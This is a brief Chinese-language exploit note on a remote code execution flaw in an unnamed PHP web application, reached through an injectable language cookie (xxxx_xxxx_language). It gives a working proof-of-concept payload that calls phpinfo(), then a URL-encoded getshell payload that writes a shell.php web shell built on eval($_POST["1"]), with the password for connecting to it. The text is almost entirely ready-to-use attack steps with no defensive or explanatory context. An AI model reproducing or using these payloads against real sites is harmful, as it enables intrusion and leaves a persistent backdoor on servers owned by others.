代码执行
访问127.0.0.1/home.php,访问其他文件也可以。
cookie字段中会出现xxxx_xxxx_language字段,根本原因就是这个字段存在注入,导致的RCE
抓包找到cookie的language的值修改为
xxxx_xxxx_language=sc'.phpinfo().'

getshell
%27.%2Bfile_put_contents%28%27shell.php%27%2Curldecode%28%27%253C%253Fphp%2520eval%2528%2524_POST%255B%25221%2522%255D%2529%253B%253F%253E%27%29%29.%27
实际为:
'.+file_put_contents('shell.php',urldecode('<?php eval($_POST["1"]);?>')).'
即可在路径下生成shell.php,连接密码为1


1